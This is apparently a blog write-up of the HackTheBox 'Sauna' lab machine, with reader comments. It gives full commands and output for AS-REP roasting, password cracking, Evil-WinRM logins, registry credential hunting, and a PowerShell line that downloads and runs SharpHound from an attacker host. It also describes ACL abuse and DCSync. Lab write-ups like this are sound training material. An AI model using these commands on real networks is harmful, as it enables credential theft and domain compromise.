HackTheBox Sauna Writeup – 10.10.10.175

HackTheBox Sauna (10.10.10.175) is a new Windows box released on 15th Feb. The machine is categorized as easy with 20 points. Since most Windows boxes seem to have a similar approach to get initial foothold and enumeration, users who already completed the machines like, Forest, Nest, Sniper and Resolute etc are going to have a good time.

HackTheBox Sauna Writeup – 10.10.10.175

Welcome back, here is my way of getting the Sauna Windows machine. I used the very common tools like EvilWinRM, GetNPusers, Bloodhound, Neo4J and JohnTheRipper. These are the same tools that I used in the previous HackTheBox Windows machines.

SCANNING AND GETTING FOOTHOLD

Let us begin, as always, I added the machine IP to etc/hosts file as sauna.htb and proceed with the nmap scan.

# root @ ns09 in ~/htb/sauna [11:52:48] 
$ nmap -sV -sC -oA nmap sauna.htb    
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 12:12 +03
Stats: 0:01:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 12:13 (0:00:06 remaining)
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 12:13 (0:00:07 remaining)
Nmap scan report for sauna.htb (10.10.10.175)
Host is up (0.12s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-17 17:14:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/17%Time=5E4A58F6%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m50s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-02-17T17:16:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 255.55 seconds

# root @ ns09 in ~/htb/sauna [12:16:17] 

The scan reveals several Windows Server related ports like, 80, 389, 135, 445, 3268 and 3269 are open. Upon visiting the default website on 80, I noticed there is a website of “Egotistical bank” is hosted.

I tried enum4linux to gather usernames but results were not as expected, enum4linux couldnt find any users. So I proceed with other ways to get users, the plan was “guessing game”.

The “Meet The Team” section of the website has a number of employees listed, this page probably help me to proceed further. BUT, the names listed are is “FirstName%%LastName” format which I highly doubt an organization might have used this naming standard in their active directory, so I need to do some testing before the next step.

What I planned is to make my own user-list with the potential users like below screenshot. My plan is to use Impacket tool called “GetNPusers“. This is the same tool I used in the previous boxes like Forest and Resolute. As you may already know, when triggered GetNPUsers returns the TGT (Ticket Granting Ticket) ONLY if the account doesn’t need Kerberos pre-authentication.

After running the GetNPUsers.py against the domain-name “egotistical-bank.local”, I successfully obtained the user FSmith’s (again ;)) TGT, the rest users ware ignored, so I believe at the moment I have only one user to work with.

# root @ ns09 in ~/htb/sauna [13:26:03] 
$ python GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -outputfile tgt.txt
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
# root @ ns09 in ~/htb/sauna [13:26:12] 
$ cat tgt.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:8eacea1db05686ae8831df5e29827d6a$2e6ba76f11987cd1a6431cb30d49b9bc3d81aeb0db0ebea1f41030caf649015f5350e2f4ca8300099d98b075464fdd79964fe7e4951b8d37538580f0ffa14d7e518477757890760c4ab7c4206ce881e47762c224b6cda4bcdc881fca5fe774854dd8239ee0746f96c52b78c0890f2a07d841d97059f4fa5aa2a45dfc04f15e1e13c984a4346ec2c7e7f44119d87f2401106379707975a28e50a0be35343cf8663c4b18dfd38601fcd9daadec11961f0ca3c0c07ed782c82aa57ca5ec34a9d3ad23bd885d409c14a67fa0bc38216629629957bb145ecf19a1bc5f7c34dbc2858b34cb297489a2a9aa90e933af056d0811e1654086a1b2b1c2afab39448a90e105
# root @ ns09 in ~/htb/sauna [13:26:19] 

In the next step, I used the John to crack the password using Rockyou.txt as wordlist. John took like half a minute to crack the hash and revealed the password as: “Thestrokes23”

# root @ ns09 in ~/htb/sauna [13:37:29] 
$ john tgt.txt -wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:41 DONE (2020-02-17 13:38) 0.02409g/s 253952p/s 253952c/s 253952C/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# root @ ns09 in ~/htb/sauna [13:38:14] 

EvilWinRM to Get the User

As I already have the user FSmith’s credentials, my next approach is to get the shell using EvilWinRm.

# root @ ns09 in ~/htb/sauna [13:43:13] 
$ ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i sauna.htb
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
    Directory: C:\Users\FSmith\Desktop
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        1/23/2020  10:03 AM             34 user.txt                                                                                                                                                                                                
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
1b5520[------------]af70cf
*Evil-WinRM* PS C:\Users\FSmith\Desktop> 

I was successfully logged-in as FSmith and obtained the user.txt from his desktop.

Privilege Escalation

A quick look showed me that the user FSmith is not an admin user, so I need to find a right user or a service to gain more authority on the system. I used the PowerShell command Get-LocalUser to get the users in the Server as below.

# root @ ns09 in ~/htb/sauna [13:51:27] 
$ ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i sauna.htb
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> Get-LocalUser
Name          Enabled Description                                             
----          ------- -----------                                             
Administrator True    Built-in account for administering the computer/domain  
Guest         False   Built-in account for guest access to the computer/domain
krbtgt        False   Key Distribution Center Service Account                 
HSmith        True                                                            
FSmith        True                                                            
svc_loanmgr   True 

I stuck again after listing the users, so decided to take some tips from the HTB forum. A user guided me in to the right direction.

Gathering Credentials From The Registry

The Windows Registry stores information that can be used by the system or other programs. The attacker can query the Registry and find credentials and passwords that have been stored auto-run programs or services, these credentials sometimes may used to run automatic login when required. Ref.

I can possibly use the following commands to get the credentials stored in the registry:

Local Machine Hive: reg query HKLM /f password /t REG_SZ /s
Current User Hive: reg query HKCU /f password /t REG_SZ /s 

Here is the snipped results after running command as local machine:

*Evil-WinRM* PS C:\Users\FSmith\Documents> reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415}
    (Default)    REG_SZ    Picture Password Enrollment UX

-------SNIP------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

-----SNIP--------------

End of search: 283 match(es) found.
*Evil-WinRM* PS C:\Users\FSmith\Documents> 

I tried the password against the Administrator unfortunately didn’t work, but the password accepted for the user svc-loanmgr. I was successfully logged to the box as svc-loanmgr.

# root @ ns09 in ~/htb/sauna [14:40:04] 
$ ruby evil-winrm.rb -u administrator -p 'Moneymakestheworldgoround!' -i sauna.htb
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
Error: Can't establish connection. Check connection params
Error: Exiting with code 1
# root @ ns09 in ~/htb/sauna [14:40:38] C:1
$ ruby evil-winrm.rb -u svc_loanmgr -p 'Moneymakestheworldgoround!' -i sauna.htb  
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 

The next step was very clear to me, I have done the box Forest using neo4j so I decided to use my experience with Forest.

Command:

powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.4:8000/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
# root @ ns09 in ~/htb/sauna [14:48:29] 
$ ruby evil-winrm.rb -u svc_loanmgr -p 'Moneymakestheworldgoround!' -i sauna.htb  

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.4:8000/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 11:51 AM on 2/17/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 ì/s --- Using 83 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4445557
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish

Compressing data to C:\Users\svc_loanmgr\Documents\20200217115111_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> dir

    Directory: C:\Users\svc_loanmgr\Documents

Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        2/17/2020  11:51 AM           7865 20200217115111_BloodHound.zip                                                                                                                                                                           
-a----        2/17/2020  11:51 AM           7297 U0FVTkE=.bin                                                                                                                                                                                            


*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 
Info: Exiting...

# root @ ns09 in ~/htb/sauna [14:49:48] C:130
$ 

The Zip file “20200217115111_BloodHound.zip” was created successfully.

I import the zip file 20200217115111_BloodHound.zip created in the svc_loanmgr folder, upon analysing it through neo4J and Bloodhound I found out that only the member of Administrators groups and Administrator is able. Our user svc_loanmgr is not member of either groups.

So one more roadblock. I head back to HTB forum looking for tips, one of the users mentioned that we can use Aclpwn.py. This tool integrates with Bloodhound and so attacker can identify and exploit ACL based privilege escalation paths inside the windows domains.

DCSync

Here is how I did it, I ran the bloodhound and the below script after few failures.

So, here I successfully managed to change the permission of the user svc_loanmgr and got all the rights to continue. I used the impacket/secretsdump to gather the Administrator password hash.

And here we have Root

As I have the hash, I will avoid cracking it. I ran Evil-WinRM again with Administrator credentials and got the root.

That’s all folks…

Thank you for reading :), See you again with another HTB write-up soon.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
3 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Rac00n
Rac00n
6 months ago

Very interesting, I didn’t use ACL privesc but went for winPEAS to get the svc password, and later continued with mimikatz for the admin hash. Thank you for posting your way of doing it.

cyruslab
6 months ago

Hi, thanks for this share as this provides me an alternative approach to get administrator’s hash. I was stucked with initial foothold as GetNPUsers.py, rpcclient -U “” -N 10.10.10.175, and enum4linux -a 10.10.10.175 all did not return anything.. then i did another round of nmap on port 389 with ldap* script, I got a lot of information, so I gather all the usernames from the script and used GetNPUsers.py again, but again nothing. So I proceeded to go to forum, I read an hour of the forum post.. and I repeatedly see f***h, and someone gave me a hint to… Read more »

Sorry, that action is blocked.